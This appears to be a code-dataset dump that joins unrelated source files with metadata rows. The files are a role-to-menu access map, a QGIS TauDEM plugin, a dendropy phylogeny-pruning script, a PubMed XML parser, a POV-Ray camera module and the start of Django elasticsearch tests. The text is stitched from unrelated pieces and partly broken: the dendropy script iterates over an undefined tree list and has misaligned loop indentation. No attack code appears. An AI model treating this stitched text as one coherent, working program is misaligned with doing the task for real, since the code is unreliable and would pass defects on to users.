'Infrastructure': ['Datastores', 'Networking', 'Providers', 'Virtual Machines', 'Hosts',
'Clusters', 'Topology', 'PXE', 'Resource Pools'],
'Physical Infrastructure': ['Topology', 'Servers', 'Providers']},
'Configuration': ['Management'],
'Control': ['Import / Export', 'Log', 'Explorer', 'Simulation'],
'Monitor': {
'Alerts': ['Overview', 'All Alerts']},
'Networks': ['Subnets', 'Load Balancers', 'Providers', 'Security Groups', 'Floating IPs',
'Network Ports', 'Topology', 'Networks', 'Network Routers'],
'Optimize': ['Bottlenecks', 'Planning', 'Utilization'],
'Red Hat Insights': ['Rules', 'Overview', 'Inventory', 'Actions'],
'Services': ['Requests', 'Workloads', 'Catalogs', 'My Services'],
'Storage': {
'Block Storage': ['Volume Snapshots', 'Managers', 'Volume Backups', 'Volumes'],
'Object Storage': ['Managers', 'Object Store Containers', 'Object Store Objects']}
},
'evmgroup-administrator': {
'Automation': {
'Ansible': ['Credentials', 'Repositories', 'Playbooks'],
'Ansible Tower': ['Jobs', 'Explorer'],
'Automate': ['Log', 'Simulation', 'Import / Export', 'Customization',
'Requests', 'Explorer']},
'Cloud Intel': ['Timelines', 'RSS', 'Dashboard', 'Reports', 'Chargeback'],
'Compute': {
'Clouds': ['Flavors', 'Instances', 'Providers', 'Host Aggregates', 'Availability Zones',
'Stacks', 'Topology'],
'Containers': ['Container Nodes', 'Containers', 'Providers', 'Overview',
'Image Registries', 'Container Builds', 'Container Services',
'Volumes', 'Container Images', 'Routes', 'Pods', 'Replicators',
'Projects', 'Topology'],
'Infrastructure': ['Datastores', 'Networking', 'Providers', 'Virtual Machines', 'Hosts',
'Clusters', 'Topology', 'PXE', 'Resource Pools'],
'Physical Infrastructure': ['Providers']},
'Configuration': ['Management'],
'Control': ['Import / Export', 'Log', 'Explorer', 'Simulation'],
'Networks': ['Providers', 'Security Groups', 'Floating IPs', 'Networks'],
'Optimize': ['Bottlenecks', 'Planning', 'Utilization'],
'Services': ['Requests', 'Workloads', 'Catalogs', 'My Services'],
'Storage': {
'Object Storage': ['Object Store Containers', 'Object Store Objects']}
},
'evmgroup-approver': {
'Cloud Intel': ['Timelines', 'RSS', 'Dashboard', 'Reports', 'Chargeback'],
'Compute': {
'Clouds': ['Instances'],
'Infrastructure': ['Datastores', 'Providers', 'Virtual Machines', 'Hosts', 'Clusters',
'PXE', 'Resource Pools'],
'Physical Infrastructure': ['Servers', 'Providers']},
'Control': ['Explorer', 'Log', 'Simulation'],
'Services': ['Requests', 'Workloads', 'My Services'],
},
'evmgroup-auditor': {
'Automation': {
'Ansible': ['Credentials', 'Repositories', 'Playbooks'],
'Ansible Tower': ['Explorer']},
'Cloud Intel': ['Timelines', 'RSS', 'Dashboard', 'Reports', 'Chargeback'],
'Compute': {
'Clouds': ['Instances'],
'Infrastructure': ['Datastores', 'Providers', 'Virtual Machines', 'Hosts', 'Clusters',
'PXE', 'Resource Pools'],
'Physical Infrastructure': ['Servers', 'Providers']},
'Control': ['Explorer', 'Log', 'Simulation'],
'Optimize': ['Bottlenecks', 'Planning', 'Utilization'],
'Services': ['Workloads', 'My Services']},
'evmgroup-desktop': {
'Automation': {
'Ansible Tower': ['Explorer']},
'Cloud Intel': ['Dashboard'],
'Compute': {
'Clouds': ['Instances'],
'Infrastructure': ['Virtual Machines']},
'Configuration': ['Management'],
'Services': ['Requests', 'Workloads']
},
'evmgroup-operator': {
'Automation': {
'Ansible': ['Credentials', 'Repositories', 'Playbooks'],
'Ansible Tower': ['Explorer']},
'Cloud Intel': ['Timelines', 'RSS', 'Dashboard', 'Reports', 'Chargeback'],
'Compute': {
'Clouds': ['Instances'],
'Infrastructure': ['Datastores', 'Providers', 'Virtual Machines', 'Hosts', 'Clusters',
'PXE', 'Resource Pools'],
'Physical Infrastructure': ['Servers', 'Providers']},
'Configuration': ['Management'],
'Services': ['Workloads', 'My Services']
},
'evmgroup-security': {
'Cloud Intel': ['Timelines', 'RSS', 'Dashboard', 'Reports', 'Chargeback'],
'Compute': {
'Clouds': ['Instances'],
'Infrastructure': ['Datastores', 'Providers', 'Virtual Machines', 'Hosts',
'Clusters', 'Resource Pools'],
'Physical Infrastructure': ['Servers', 'Providers']},
'Control': ['Explorer', 'Log', 'Simulation'],
'Services': ['My Services', 'Workloads']
},
'evmgroup-support': {
'Cloud Intel': ['Timelines', 'RSS', 'Dashboard', 'Reports', 'Chargeback'],
'Compute': {
'Clouds': ['Instances'],
'Infrastructure': ['Datastores', 'Providers', 'Virtual Machines', 'Hosts', 'Clusters',
'Resource Pools'],
'Physical Infrastructure': ['Servers', 'Providers']},
'Control': ['Explorer', 'Log', 'Simulation'],
'Services': ['My Services', 'Workloads']
},
'evmgroup-user': {
'Cloud Intel': ['Timelines', 'RSS', 'Dashboard', 'Reports', 'Chargeback'],
'Compute': {
'Clouds': ['Instances'],
'Infrastructure': ['Datastores', 'Providers', 'Virtual Machines', 'Hosts', 'Clusters',
'Resource Pools'],
'Physical Infrastructure': ['Servers', 'Providers']},
'Services': ['Requests', 'Workloads', 'My Services']
},
'evmgroup-vm_user': {
'Automation': {
'Ansible': ['Credentials', 'Repositories', 'Playbooks'],
'Ansible Tower': ['Explorer']},
'Compute': {
'Clouds': ['Instances'],
'Infrastructure': ['Virtual Machines']},
'Configuration': ['Management'],
'Services': ['Requests', 'Workloads'],
}
}
role_access_ui_58z = {
'evmgroup-super_administrator': {
'Automation': {
'Ansible': ['Credentials', 'Repositories', 'Playbooks'],
'Ansible Tower': ['Jobs', 'Explorer'],
'Automate': ['Log', 'Simulation', 'Import / Export', 'Customization', 'Explorer']},
'Cloud Intel': ['Timelines', 'RSS', 'Dashboard', 'Reports', 'Chargeback'],
'Compute': {
'Clouds': ['Flavors', 'Instances', 'Providers', 'Host Aggregates', 'Availability Zones',
'Key Pairs', 'Tenants', 'Stacks', 'Topology'],
'Containers': ['Container Nodes', 'Containers', 'Providers', 'Overview',
'Container Templates', 'Image Registries', 'Container Builds',
'Container Services', 'Volumes', 'Container Images', 'Routes', 'Pods',
'Replicators', 'Projects', 'Topology'],
'Infrastructure': ['Datastores', 'Networking', 'Providers', 'Virtual Machines', 'Hosts',
'Clusters', 'Topology', 'PXE', 'Resource Pools']},
'Configuration': ['Management'],
'Control': ['Import / Export', 'Log', 'Explorer', 'Simulation'],
'Networks': ['Subnets', 'Load Balancers', 'Providers', 'Security Groups', 'Floating IPs',
'Network Ports', 'Topology', 'Networks', 'Network Routers'],
'Optimize': ['Bottlenecks', 'Planning', 'Utilization'],
'Red Hat Insights': ['Rules', 'Overview', 'Systems'],
'Services': ['Requests', 'Workloads', 'Catalogs', 'My Services'],
'Storage': {
'Block Storage': ['Volume Snapshots', 'Managers', 'Volume Backups', 'Volumes'],
'Object Storage': ['Managers', 'Object Store Containers', 'Object Store Objects']}
},
'evmgroup-administrator': {
'Automation': {
'Ansible Tower': ['Jobs', 'Explorer'],
'Automate': ['Log', 'Simulation', 'Import / Export', 'Customization', 'Explorer']},
'Cloud Intel': ['Timelines', 'RSS', 'Dashboard', 'Reports', 'Chargeback'],
'Compute': {
'Clouds': ['Flavors', 'Instances', 'Providers', 'Host Aggregates', 'Availability Zones',
'Stacks', 'Topology'],
'Containers': ['Container Nodes', 'Containers', 'Providers', 'Overview',
'Image Registries', 'Container Builds', 'Container Services',
'Volumes', 'Container Images', 'Routes', 'Pods', 'Replicators',
'Projects', 'Topology'],
'Infrastructure': ['Datastores', 'Networking', 'Providers', 'Virtual Machines', 'Hosts',
'Clusters', 'Topology', 'PXE', 'Resource Pools']},
'Configuration': ['Management'],
'Control': ['Import / Export', 'Log', 'Explorer', 'Simulation'],
'Networks': ['Providers', 'Security Groups', 'Floating IPs', 'Networks'],
'Optimize': ['Bottlenecks', 'Planning', 'Utilization'],
'Services': ['Requests', 'Workloads', 'Catalogs', 'My Services'],
'Storage': {
'Object Storage': ['Object Store Containers', 'Object Store Objects']}
},
'evmgroup-approver': {
'Cloud Intel': ['Timelines', 'RSS', 'Dashboard', 'Reports', 'Chargeback'],
'Compute': {
'Clouds': ['Instances'],
'Infrastructure': ['Datastores', 'Providers', 'Virtual Machines', 'Hosts', 'Clusters',
'PXE', 'Resource Pools']},
'Control': ['Log', 'Simulation'],
'Services': ['Requests', 'Workloads'],
},
'evmgroup-auditor': {
'Automation': {
'Ansible': ['Credentials', 'Repositories', 'Playbooks'],
'Ansible Tower': ['Explorer']},
'Cloud Intel': ['Timelines', 'RSS', 'Dashboard', 'Reports', 'Chargeback'],
'Compute': {
'Clouds': ['Instances'],
'Infrastructure': ['Datastores', 'Providers', 'Virtual Machines', 'Hosts', 'Clusters',
'PXE', 'Resource Pools']},
'Control': ['Log', 'Simulation'],
'Optimize': ['Bottlenecks', 'Planning', 'Utilization'],
'Services': ['Workloads']},
'evmgroup-desktop': {
'Automation': {
'Ansible Tower': ['Explorer']},
'Cloud Intel': ['Dashboard'],
'Compute': {
'Clouds': ['Instances'],
'Infrastructure': ['Virtual Machines']},
'Configuration': ['Management'],
'Services': ['Requests', 'Workloads']
},
'evmgroup-operator': {
'Automation': {
'Ansible': ['Credentials', 'Repositories', 'Playbooks'],
'Ansible Tower': ['Explorer']},
'Cloud Intel': ['Timelines', 'RSS', 'Dashboard', 'Reports', 'Chargeback'],
'Compute': {
'Clouds': ['Instances'],
'Infrastructure': ['Datastores', 'Providers', 'Virtual Machines', 'Hosts', 'Clusters',
'PXE', 'Resource Pools']},
'Configuration': ['Management'],
'Services': ['Workloads']
},
'evmgroup-security': {
'Cloud Intel': ['Timelines', 'RSS', 'Dashboard', 'Reports', 'Chargeback'],
'Compute': {
'Clouds': ['Instances'],
'Infrastructure': ['Datastores', 'Providers', 'Virtual Machines', 'Hosts',
'Clusters', 'Resource Pools']},
'Control': ['Log', 'Simulation'],
'Services': ['Workloads']
},
'evmgroup-support': {
'Cloud Intel': ['Timelines', 'RSS', 'Dashboard', 'Reports', 'Chargeback'],
'Compute': {
'Clouds': ['Instances'],
'Infrastructure': ['Datastores', 'Providers', 'Virtual Machines', 'Hosts', 'Clusters',
'Resource Pools']},
'Control': ['Log', 'Simulation'],
'Services': ['Workloads']
},
'evmgroup-user': {
'Cloud Intel': ['Timelines', 'RSS', 'Dashboard', 'Reports', 'Chargeback'],
'Compute': {
'Clouds': ['Instances'],
'Infrastructure': ['Datastores', 'Providers', 'Virtual Machines', 'Hosts', 'Clusters',
'Resource Pools']},
'Services': ['Requests', 'Workloads']
},
'evmgroup-vm_user': {
'Automation': {
'Ansible': ['Credentials', 'Repositories', 'Playbooks'],
'Ansible Tower': ['Explorer']},
'Compute': {
'Clouds': ['Instances'],
'Infrastructure': ['Virtual Machines']},
'Configuration': ['Management'],
'Services': ['Requests', 'Workloads'],
}
}
role_access_ssui = {
'evmgroup-user_limited_self_service': {
'Compute': {
'Clouds': ['Instances'],
'Infrastructure': ['Virtual Machines']},
'Services': ['Requests', 'Catalogs', 'My Services']
},
'evmgroup-user_self_service': {
'Automation': {
'Ansible': ['Credentials', 'Repositories', 'Playbooks'],
'Ansible Tower': ['Explorer']},
'Compute': {
'Clouds': ['Instances'],
'Infrastructure': ['Virtual Machines'],
'Physical Infrastructure': ['Providers']},
'Configuration': ['Management'],
'Services': ['Requests', 'Catalogs', 'My Services']
},
}
| gpl-2.0 | -5,444,973,989,046,818,000 | 38.60312 | 100 | 0.529036 | false | 4.190537 | true | false | false |
camptocamp/QGIS | python/plugins/processing/taudem/dinftranslimaccum.py | 1 | 4866 | # -*- coding: utf-8 -*-
"""
***************************************************************************
dinftranslimaccum.py
---------------------
Date : October 2012
Copyright : (C) 2012 by Alexander Bruy
Email : alexander dot bruy at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Alexander Bruy'
__date__ = 'October 2012'
__copyright__ = '(C) 2012, Alexander Bruy'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import os
from PyQt4.QtGui import *
from processing.core.GeoAlgorithm import GeoAlgorithm
from processing.core.ProcessingLog import ProcessingLog
from processing.tools.system import *
from processing.core.ProcessingConfig import ProcessingConfig
from processing.core.GeoAlgorithmExecutionException import GeoAlgorithmExecutionException
from processing.parameters.ParameterRaster import ParameterRaster
from processing.parameters.ParameterVector import ParameterVector
from processing.parameters.ParameterBoolean import ParameterBoolean
from processing.outputs.OutputRaster import OutputRaster
from processing.taudem.TauDEMUtils import TauDEMUtils
class DinfTransLimAccum(GeoAlgorithm):
DINF_FLOW_DIR_GRID = "DINF_FLOW_DIR_GRID"
SUPPLY_GRID = "SUPPLY_GRID"
CAPACITY_GRID = "CAPACITY_GRID"
IN_CONCENTR_GRID = "IN_CONCENTR_GRID"
OUTLETS_SHAPE = "OUTLETS_SHAPE"
EDGE_CONTAM = "EDGE_CONTAM"
TRANSP_LIM_ACCUM_GRID = "TRANSP_LIM_ACCUM_GRID"
DEPOSITION_GRID = "DEPOSITION_GRID"
OUT_CONCENTR_GRID = "OUT_CONCENTR_GRID"
def getIcon(self):
return QIcon(os.path.dirname(__file__) + "/../images/taudem.png")
def defineCharacteristics(self):
self.name = "D-Infinity Transport Limited Accumulation"
self.cmdName = "dinftranslimaccum"
self.group = "Specialized Grid Analysis tools"
self.addParameter(ParameterRaster(self.DINF_FLOW_DIR_GRID, "D-Infinity Flow Direction Grid", False))
self.addParameter(ParameterRaster(self.SUPPLY_GRID, "Supply Grid", False))
self.addParameter(ParameterRaster(self.CAPACITY_GRID, "Transport Capacity Grid", False))
self.addParameter(ParameterVector(self.OUTLETS_SHAPE, "Outlets Shapefile", [ParameterVector.VECTOR_TYPE_POINT], True))
self.addParameter(ParameterBoolean(self.EDGE_CONTAM, "Check for edge contamination", True))
self.addOutput(OutputRaster(self.TRANSP_LIM_ACCUM_GRID, "Transport Limited Accumulation Grid"))
self.addOutput(OutputRaster(self.DEPOSITION_GRID, "Deposition Grid"))
def processAlgorithm(self, progress):
commands = []
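        # Build the TauDEM invocation as an argv list: "mpiexec -n <procs>
        # <taudem_dir>/dinftranslimaccum" followed by the tool's -ang/-tsup/-tc
        # inputs, the optional -o/-nc switches and the -tla/-tdep outputs.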
commands.append(os.path.join(TauDEMUtils.mpiexecPath(), "mpiexec"))
processNum = ProcessingConfig.getSetting(TauDEMUtils.MPI_PROCESSES)
if processNum <= 0:
raise GeoAlgorithmExecutionException("Wrong number of MPI processes used.\nPlease set correct number before running TauDEM algorithms.")
commands.append("-n")
commands.append(str(processNum))
commands.append(os.path.join(TauDEMUtils.taudemPath(), self.cmdName))
commands.append("-ang")
commands.append(self.getParameterValue(self.DINF_FLOW_DIR_GRID))
commands.append("-tsup")
commands.append(self.getParameterValue(self.SUPPLY_GRID))
commands.append("-tc")
commands.append(self.getParameterValue(self.CAPACITY_GRID))
param = self.getParameterValue(self.OUTLETS_SHAPE)
if param is not None:
commands.append("-o")
commands.append(param)
if str(self.getParameterValue(self.EDGE_CONTAM)).lower() == "false":
commands.append("-nc")
commands.append("-tla")
commands.append(self.getOutputValue(self.TRANSP_LIM_ACCUM_GRID))
commands.append("-tdep")
commands.append(self.getOutputValue(self.DEPOSITION_GRID))
loglines = []
loglines.append("TauDEM execution command")
for line in commands:
loglines.append(line)
ProcessingLog.addToLog(ProcessingLog.LOG_INFO, loglines)
TauDEMUtils.executeTauDEM(commands, progress)
#def helpFile(self):
# return os.path.join(os.path.dirname(__file__), "help", self.cmdName + ".html")
| gpl-2.0 | -4,222,742,194,063,032,300 | 42.446429 | 146 | 0.639129 | false | 3.96577 | false | false | false |
wrightaprilm/squamates | prunetree.py | 1 | 4177 | #! /usr/bin/env python
import dendropy
from dendropy.utility.fileutils import find_files
## operations for the ml tree
ml = dendropy.Tree.get_from_path("filename", "format")
print(ml.description())
spe_node = ml.find_node_with_taxon_label("Sphenodon punctatus")
outgroup_node = spe_node.parent_node
ml.reroot_at_node(outgroup_node, update_splits=True)
ml.write_to_path("filenamererooted", "newick")
## clone rerooted tree for pruning
ml0 = dendropy.Tree(ml)
ml1 = dendropy.Tree(ml)
ml2 = dendropy.Tree(ml)
ml3 = dendropy.Tree(ml)
ml4 = dendropy.Tree(ml)
ml5 = dendropy.Tree(ml)
## get mrca nodes for clades
ang_mrca = ml.mrca(taxon_labels=["Varanus indicus", "Anniella pulchra"])
gek_mrca = ml.mrca(taxon_labels=["Phelsuma ornata", "Delma impar"])
igu_mrca = ml.mrca(taxon_labels=["Iguana iguana", "Chamaeleo zeylanicus"])
lac_mrca = ml.mrca(taxon_labels=["Bipes biporus", "Teius teyou"])
ser_mrca = ml.mrca(taxon_labels=["Nerodia rhombifer", "Liotyphlops albirostris"])
sci_mrca = ml.mrca(taxon_labels=["Plestiodon fasciatus", "Acontias percivali"])
## pruning and writing trees goes here
ang_ml=dendropy.Tree()
ang_ml.seed_node = ang_mrca
ang_ml.write_to_path("ang_ml.tre","newick")
gek_ml=dendropy.Tree()
gek_ml.seed_node = gek_mrca
gek_ml.write_to_path("gek_ml.tre","newick")
igu_ml=dendropy.Tree()
igu_ml.seed_node = igu_mrca
igu_ml.write_to_path("igu_ml.tre","newick")
lac_ml=dendropy.Tree()
lac_ml.seed_node = lac_mrca
lac_ml.write_to_path("lac_ml.tre","newick")
ser_ml=dendropy.Tree()
ser_ml.seed_node = ser_mrca
ser_ml.write_to_path("ser_ml.tre","newick")
sci_ml=dendropy.Tree()
sci_ml.seed_node = sci_mrca
sci_ml.write_to_path("sci_ml.tre","newick")
## uncomment if trees are in separate files, import list of trees of type newick
##flist = find_files(top='trees', filename_filter='*.dated.tre')
##sqtrees = [dendropy.Tree.get_from_path(filename,"newick") for filename in flist]
##print(sqtrees.description(2))
## empty tree lists for pruned trees
angtrees = dendropy.TreeList()
gektrees = dendropy.TreeList()
igutrees = dendropy.TreeList()
lactrees = dendropy.TreeList()
sertrees = dendropy.TreeList()
scitrees = dendropy.TreeList()
## same operations as above but for a sample of trees
for tree in sqtrees:
    spe_node = tree.find_node_with_taxon_label("Sphenodon punctatus")
    outgroup_node = spe_node.parent_node
    tree.reroot_at_node(outgroup_node)
tree.write_to_path("treelistrerooted.tre","newick")
## clone tree list for pruning, will take a while
sq0 = dendropy.TreeList(sqtrees)
sq1 = dendropy.TreeList(sqtrees)
sq2 = dendropy.TreeList(sqtrees)
sq3 = dendropy.TreeList(sqtrees)
sq4 = dendropy.TreeList(sqtrees)
sq5 = dendropy.TreeList(sqtrees)
## pruning from lists of trees
for tree in sqtrees:
rep_ang_mrca = tree.mrca(taxon_labels=["Varanus indicus", "Anniella pulchra"])
ang_tree=dendropy.Tree()
ang_tree.seed_node = rep_ang_mrca
angtrees.append(ang_tree)
for tree in sqtrees:
rep_gek_mrca = tree.mrca(taxon_labels=["Phelsuma ornata", "Delma impar"])
gek_tree=dendropy.Tree()
gek_tree.seed_node = rep_gek_mrca
gektrees.append(gek_tree)
for tree in sqtrees:
rep_igu_mrca = tree.mrca(taxon_labels=["Iguana iguana", "Chamaeleo zeylanicus"])
igu_tree=dendropy.Tree()
igu_tree.seed_node = rep_igu_mrca
igutrees.append(igu_tree)
for tree in sqtrees:
rep_lac_mrca = tree.mrca(taxon_labels=["Bipes biporus", "Teius teyou"])
lac_tree=dendropy.Tree()
lac_tree.seed_node = rep_lac_mrca
lactrees.append(lac_tree)
for tree in sqtrees:
rep_ser_mrca = tree.mrca(taxon_labels=["Nerodia rhombifer", "Liotyphlops albirostris"])
ser_tree=dendropy.Tree()
ser_tree.seed_node = rep_ser_mrca
sertrees.append(ser_tree)
for tree in sqtrees:
rep_sci_mrca = tree.mrca(taxon_labels=["Plestiodon fasciatus", "Acontias percivali"])
sci_tree=dendropy.Tree()
sci_tree.seed_node = rep_sci_mrca
scitrees.append(sci_tree)
## write tree lists
angtrees.write_to_path("angtrees.tre", "newick")
gektrees.write_to_path("gektrees.tre", "newick")
igutrees.write_to_path("igutrees.tre", "newick")
lactrees.write_to_path("lactrees.tre", "newick")
sertrees.write_to_path("sertrees.tre", "newick")
scitrees.write_to_path("scitrees.tre", "newick")
| mit | -9,109,998,698,335,899,000 | 31.889764 | 88 | 0.734977 | false | 2.414451 | false | false | false |
jasonost/clinicaltrials | pubmed/Process_pub_data.py | 1 | 7282 | from bs4 import BeautifulSoup
import cPickle as pickle
import time
import os
def get_articles_data(data, investigator_mesh_dict):
time_count = 0
last_time = time.time()
auth_articles = {}
auth_articles_abs = {}
for key, value in data.items():
#test to see if value is null, if it is skip it
if value is None:
continue
time_count += 1
if (time_count%100) == 0:
print 'Count: ', time_count
print 'Duration (mins): ', (time.time() - last_time)/60
last_time = time.time()
#if the investigator has no mesh terms in the db skip them
if len(investigator_mesh_dict[key]['mesh']) == 0:
continue
auth_articles[key] = {}
auth_articles_abs[key] = {}
soup = BeautifulSoup(value)
for article in soup.findAll('pubmedarticle'):
#FILTER
#get published dates
#most pubdates refer to date as year but some refer to it as medlinedate
try:
year = article.findChild('pubdate').findChild('year').text
except:
#this includes months so we just pull out the year
year = article.findChild('pubdate').findChild('medlinedate').text[:4]
#if the year of the article is before 1995 skip it
if int(year) < 1995:
continue
mesh_list = article.findChild('meshheadinglist')
#if there are no mesh terms skip article
if mesh_list is None:
continue
#creates a list of mesh terms. each mesh term is a tuple with
#a major minor marker
mesh_terms = article.findAll('meshheading')
mesh_terms_list = []
for term in mesh_terms:
for element in term:
try:
if element.name == 'descriptorname':
mesh_terms_list.append((element.text, element.attrs.values()[0]))
except:
pass
#check to see if there are any matching mesh terms between the
#article and the investigator mesh terms from the db
skip_switch = True
for term, weight in mesh_terms_list:
#do not use certain very common mesh terms for matching
if term.lower() in ['adult', 'humans', 'male', 'female', 'aged']:
continue
if term.lower() in investigator_mesh_dict[key]['mesh']:
skip_switch = False
break
if skip_switch:
continue
#GET DATA
title = article.findChild('articletitle').text
pub_id = article.findChild('pmid').text
#get a list of all other ids
other_ids = article.findAll('articleid')
other_ids_list = []
for ids in other_ids:
other_ids_list.append((ids.attrs.values()[0],ids.text))
abstract = str(article.findChild('abstract'))
#creates a list of lists where each list consists of
#tuples of data types and the data
authors = article.findAll('author')
authors_list = []
for author in authors:
temp = []
for element in author:
try:
if element.name is not None:
if element.name == 'initials' or element.name == 'suffix':
continue
if element.name == 'forename':
temp[0] = element.text + ' ' + temp[0]
continue
temp.append(element.text)
except:
pass
authors_list.append(temp)
del temp
country = article.findChild('country').text
language = article.findChild('language').text
#this is a list of the chemicals found in the paper
            #may be useful for matching articles to trials
#creates a list of all the chemicals in the paper if there are any
chemicals = article.findAll('chemical')
chemicals_list = []
for chemical in chemicals:
for element in chemical:
try:
if element.name == 'nameofsubstance':
chemicals_list.append(element.text)
except:
pass
#creates a list of keywords. each keyword is a tuple with
#a major minor marker
keywords = article.findAll('keyword')
keywords_list = []
for keyword in keywords:
keywords_list.append((keyword.text, keyword.attrs.values()[0]))
#not all journals have an issn, get text if it exists, pass if it doesn't
journal_id_issn = article.findChild('issn')
try:
journal_id_issn = journal_id_issn.text
except:
pass
#create dictionary
auth_articles[key][pub_id] = {'journal_id':journal_id_issn,
'keywords':keywords_list,
'mesh':mesh_terms_list,
'chemicals':chemicals_list,
'language':language,
'country':country,
'authors':authors_list,
'other_ids':other_ids_list,
'title':title,
'year':year
}
auth_articles_abs[key][pub_id] = abstract
return auth_articles, auth_articles_abs
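# get_articles_data() returns two dicts, each keyed by investigator and then by
# PubMed ID: one with the parsed article metadata, one with the raw abstract markup.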
#load in data files to run
data_list = []
data_files = os.listdir('.')
for f in data_files:
if 'investigator_dict_' in f:
data_list.append(f)
#list to keep track of which files have been run
run_files_list = []
#load previous run files list
try:
    run_files_list = pickle.load(open('processing_run_file_list.pkl', 'rb'))
except:
pass
#load in investigator mesh term dict
investigator_mesh_dict = pickle.load(open('investigator_mesh_dict.pkl', 'rb'))
#lowercase all mesh terms
for invest in investigator_mesh_dict:
investigator_mesh_dict[invest]['mesh'] = [x.lower() for x in investigator_mesh_dict[invest]['mesh']]
for f in data_list:
print f
if f not in run_files_list:
#load data to process
data = pickle.load(open( f, 'rb'))
#process data
auth_articles, auth_articles_abs = get_articles_data(data, investigator_mesh_dict)
if len(auth_articles) > 0:
pickle.dump(auth_articles, open('investigator_process/processed_' + f,'wb'))
pickle.dump(auth_articles_abs, open('investigator_process/abstracts_' + f,'wb'))
pickle.dump(run_files_list, open('processing_run_file_list.pkl', 'wb'))
del auth_articles
del auth_articles_abs
del data
run_files_list.append(f)
| mit | 7,680,286,593,999,288,000 | 34.521951 | 104 | 0.516754 | false | 4.497838 | false | false | false |
tschijnmo/ccpoviz | ccpoviz/defcamera.py | 1 | 3619 | """
Defining the camera for Pov-Ray visualization
=============================================
In order to hide the obscure pov-ray camera definition from users, here
functions are provided to translate more user-friendly inputs into the pov-ray
options for the camera.
In order to specify a camera, the parameters needed are
focus
The focus of the camera, where to look at. Given relative to the centre of
the molecule.
distance
The distance from the camera to the focus.
theta, phi
    The inclination and azimuth angles for the camera; basically the camera is
    going to be placed at the position with spherical coordinate (distance,
theta, phi) with the focus as the origin.
rotation
The rotation of the camera within the plane of picturing.
aspect_ratio
The aspect-ratio, default to 4:3.
"""
import math
import numpy as np
from .util import format_vector, terminate_program
def compute_pos_ops(focus, distance, theta, phi, rotation, aspect_ratio):
"""Computes the camera options related to position and orientation
The arguments are documented in the module definition. The result will be a
list of dictionaries with the option name under the tag ``op-name`` and the
    option value under the tag ``op-value``. This can be directly used for
rendering the pov-ray input mustache template.
The location and focus of the camera is also returned for later usage when
defining the light source.
    All the angles should be in radians.
"""
# pylint: disable=too-many-arguments
camera_pos = np.array([
math.sin(theta) * math.cos(phi), math.sin(theta) * math.sin(phi),
math.cos(theta)
]) * distance + focus
sky_vec = np.array([
math.sin(rotation), math.cos(rotation), 0.0
])
up_vec = np.array([0.0, 1.0, 0.0])
right_vec = np.array([-aspect_ratio, 0.0, 0.0])
ret_val = [
('location', format_vector(camera_pos)),
('up', format_vector(up_vec)),
('right', format_vector(right_vec)),
('sky', format_vector(sky_vec)),
('look_at', format_vector(focus))
]
return ([
{'op-name': i[0], 'op-value': i[1]}
for i in ret_val
], camera_pos, focus)
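# For example (illustrative call; the option strings depend on format_vector),
# compute_pos_ops(np.zeros(3), 10.0, 0.0, 0.0, 0.0, 4.0 / 3.0) returns a list of
# entries such as {'op-name': 'location', 'op-value': ...} together with the
# camera position and the focus, ready to drop into the mustache context.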
def gen_camera_ops(ops_dict, structure):
"""Generate the list for the camera options
This is a shallow wrapper of the above :py:func:`compute_pos_ops` where the
reading and verification of the user input is also performed.
:param ops_dict: The dictionary of options for the run
:param structure: The structure to plot
:returns: A list of dictionaries for rendering the camera in the pov-ray
        mustache template. The resulting list can be assigned to a key in the
rendering dictionary. And the location and the focus of the camera is
also returned.
"""
# First we need to find the focus out
focus_inp = ops_dict['camera-focus']
focus = np.mean([
i.coord for i in structure.atms
], axis=0)
if len(focus_inp) == 3:
focus += np.array(focus_inp)
else:
terminate_program(
'Invalid camera-focus option: %r' % focus_inp
)
# Other parameters
distance = ops_dict['camera-distance']
to_radian = 2 * math.pi / 360.0
theta = ops_dict['camera-theta']
theta *= to_radian
phi = ops_dict['camera-phi']
phi *= to_radian
rotation = ops_dict['camera-rotation']
rotation *= to_radian
aspect_ratio = ops_dict['aspect-ratio']
return compute_pos_ops(
focus, distance, theta, phi, rotation, aspect_ratio
)
| mit | -1,858,015,693,737,558,800 | 27.722222 | 79 | 0.648798 | false | 3.866453 | false | false | false |
ytyng/django-elasticindex | tests/tests.py | 1 | 5365 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import time
from django.test import TestCase
from .models import DummyModel, DummyESDocument, DummyESDocumentPresetIndex
class TestESDocumentTest(TestCase):
def setUp(self):
if DummyESDocument.index.exists():
DummyESDocument.index.delete()
DummyESDocument.index.create()
# install fixtures.
# Bulk update from model instances.
DummyModel.objects.create(key='quick', value='brown fox')
DummyModel.objects.create(key='jumps', value='over the')
DummyESDocument.rebuild_index()
# Update from single instance.
d3 = DummyModel.objects.create(key='lazy', value='dogs.')
DummyESDocument.rebuild_index_by_source_model(d3)
# Update from dict
DummyESDocument.update('id-manually', {'key': 'spam', 'value': 'eggs'})
# Wait commit
for i in range(10):
try:
result = DummyESDocument.objects.get(
{"term": {"value": "eggs"}})
break
except DummyESDocument.DoesNotExist:
time.sleep(0.3)
continue
self.assertEqual(result.key, 'spam')
def test_index_search(self):
# Simple query
results = DummyESDocument.objects.query({"match": {"key": "jumps"}})
result = list(results)[0]
self.assertEqual(result.value, 'over the')
# OR query
qs = DummyESDocument.objects.query(
{"bool": {
"should": [
{"match": {"value": "dogs"}},
{"match": {"value": "fox"}},
]}})
qs = qs.order_by({"key": "desc"})
result = qs[1]
self.assertEqual(result.value, "dogs.")
def tearDown(self):
# teardown ES index
DummyESDocument.index.delete()
class TestESDocumentPresetIndexTest(TestCase):
def setUp(self):
if DummyESDocumentPresetIndex.index.exists():
DummyESDocumentPresetIndex.index.delete()
DummyESDocumentPresetIndex.index.create()
DummyESDocumentPresetIndex.update(
'doc1', {
'key': 'doc1',
'text_k': "セキュリティのため、ローカルホストやローカルネットワークに"
"しかアクセスを許可していない Web アプリってあると思います。",
'text_b': "例えば、オフィスで起動している社内サーバ。Jenkinsとか。"
"Wikiとか。サーバ監視ツールとか。例えば、本番環境で起動"
"している Docker コンテナの中で動いているWebツールとか。",
})
DummyESDocumentPresetIndex.update(
'doc2', {
'key': 'doc2',
'text_k': "私の場合は、elasticsearch の head プラグインのWeb"
"管理画面を起動しているのですが、ローカルホストからしか"
"アクセスを許可してませんので、外からアクセスするには"
"一工夫必要です。",
